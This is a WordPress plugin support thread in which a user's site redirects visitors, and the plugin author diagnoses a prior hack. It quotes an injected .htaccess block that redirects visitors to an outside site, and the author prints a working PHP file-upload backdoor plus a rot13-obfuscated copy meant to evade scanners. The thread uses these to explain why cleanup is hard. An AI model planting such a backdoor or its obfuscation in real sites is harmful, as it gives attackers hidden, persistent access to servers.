WordPress.org

Ready to get started?Download WordPress

Forums

BulletProof Security
[resolved] redirected to browser homepage (10 posts)

  1. chicchera
    Member
    Posted 1 year ago #

    After installing BulletProof, no matter what address I typed in the browser, any browser, I just saw in a flash the address desired and inmediately after I was redirected to my browser homepage (google seaarch). I had to reinstall the complete site miinus the plugin.

    How can I make sure that if I reinstall it it will not happen again?

    thanks

    http://wordpress.org/extend/plugins/bulletproof-security/

  2. AITpro
    Member
    Plugin Author

    Posted 1 year ago #

    I need more details about what the issue is.

    What exactly do you mean by your statement below? Please explain with specific examples.

    ...no matter what address I typed in the browser, any browser, I just saw in a flash the address desired and inmediately after I was redirected to my browser homepage (google seaarch)....

    What type of Hosting do you have? Linux or Windows or some other type of hosting?

  3. chicchera
    Member
    Posted 1 year ago #

    Hi, thanks for the prompt reply,

    What happened was that i was locked out of the site: whenever I tried to access a page, or the front page, form a bookmark, say, I could see for an instant the requested address but then it desappeared and I landed on my broser home page (google.com), and that regardless of the browser or machine I was using.

    I solved the problem uninstalling everything (this is a new project I am working on) and reinstalled WordPress and all the plugins but BulletProof security. Now it works. Pity though...

  4. AITpro
    Member
    Plugin Author

    Posted 1 year ago #

    Oh ok this sounds like the Broken cPanel HotLink Protection Tool problem. Please see this thread >>> http://wordpress.org/support/topic/plugin-bulletproof-security-broken-cpanel-hotlink-tool-404-errors-unable-to-edit-htaccess-files?replies=6

  5. AITpro
    Member
    Plugin Author

    Posted 1 year ago #

    Did you check for the broken cpanel hotlink protection tool problem? is this problem resolved? or did you decide to just not install BPS? Please resolve this thread if the problem is resolved. Thanks.

  6. chicchera
    Member
    Posted 1 year ago #

    Sorry, not yet as I was travelling. I'll have a look later in the evening.

  7. chicchera
    Member
    Posted 1 year ago #

    Anyway, I had a quick look at the link, but my .htaccess now looks like this, and I say now because a few days agoe all mu .htaccess had a lot of redirections, and no matter which permissions I set to the file they are changed in few minutes to 644 and all the non wordpress stuff reappears. This happenede after my provider (HostMonster) notified me that there had been an injection of some sort and that they had automatically corrected the file and would continue to do so :(
    It is difficult to read because I have left the original formatting, in case tha is of any help.

    <IfModule mod_rewrite.c>
    																														RewriteEngine On
    																														RewriteCond %{HTTP_REFERER} ^.*(ladyluck)\.(.*)
    																														RewriteRule ^(.*)$ http://ya.ru [R=301,L]
    																														</IfModule>																														
    
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    
    																														ErrorDocument 500 http://ya.ru

    and some 50 empty lines after the last one

  8. AITpro
    Member
    Plugin Author

    Posted 1 year ago #

    ah ok now i see what the problem is. Your website was already hacked before you installed BPS.

    BPS does not automatically clean up a hacked website. You can try using a scanning plugin to find and clean the site, but scanning plugins are only capable of finding some and not all of the hackers files. They will not detect hacker's backdoor scripts.

    So the best thing to do would be to restore your website from a good backup or backup your entire website and database and then delete your entire site and database and install everything brand new and then import ONLY your database content tables.

    A hacker's very simple backdoor uploader - just a simple upload form. A scanning plugin will not find this code and the hacker will just upload his/her files again to your website.

    if (isset($_POST['booger'])) {
    $tmp_file = $_FILES['blah']['tmp_name'];
    $folder_path = $_SERVER['DOCUMENT_ROOT'].'/';
    $uploaded_file = $_FILES['blah']['name'];
    	if (!empty($_FILES)) {
    	move_uploaded_file($tmp_file, $uploaded_file);
    	}
    }
    
    <form name="Scanners_Dont_See_Me" action="" method="post" enctype="multipart/form-data">
    <input name="blah" type="file" />
    <input type="submit" name="booger" class="button" value="Kitty Cat" />
    </form>

    And for the scanners that look for forms and form processing coding they are easily beaten by using the str_rot13 php function or many other methods to hide the form and form processing coding.

    This is the exact same form processing code as shown above, but it is hidden using str_rot13

    str_rot13('vs (vffrg($_CBFG['."'".obbtre."'".'])) {
    $gzc_svyr = $_SVYRF['."'".oynu."'".']['."'".gzc_anzr."'".'];
    $sbyqre_cngu = $_FREIRE['."'".QBPHZRAG_EBBG."'".']'."."."'"."/'".';
    $hcybnqrq_svyr = $_SVYRF['."'".oynu."'".']['."'".anzr."'".'];
    	vs (!rzcgl($_SVYRF)) {
    	zbir_hcybnqrq_svyr($gzc_svyr, $hcybnqrq_svyr);
    	}
    }');
  9. chicchera
    Member
    Posted 1 year ago #

    Thanks a lot. I will have to do a lot of work to check several sites though... well, your help has been invaluable and after I've solved the problems I will reinstall BPS

  10. AITpro
    Member
    Plugin Author

    Posted 1 year ago #

    Yeah i hate to be the one to tell you the bad news. I'm sorry that your site was hacked. it sucks. ;(

    And yep you want to lock all of your websites down if they are all under the same Hosting account and restore all of them at the same time. And of course change all of your passwords too. Ugh.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags

No tags yet.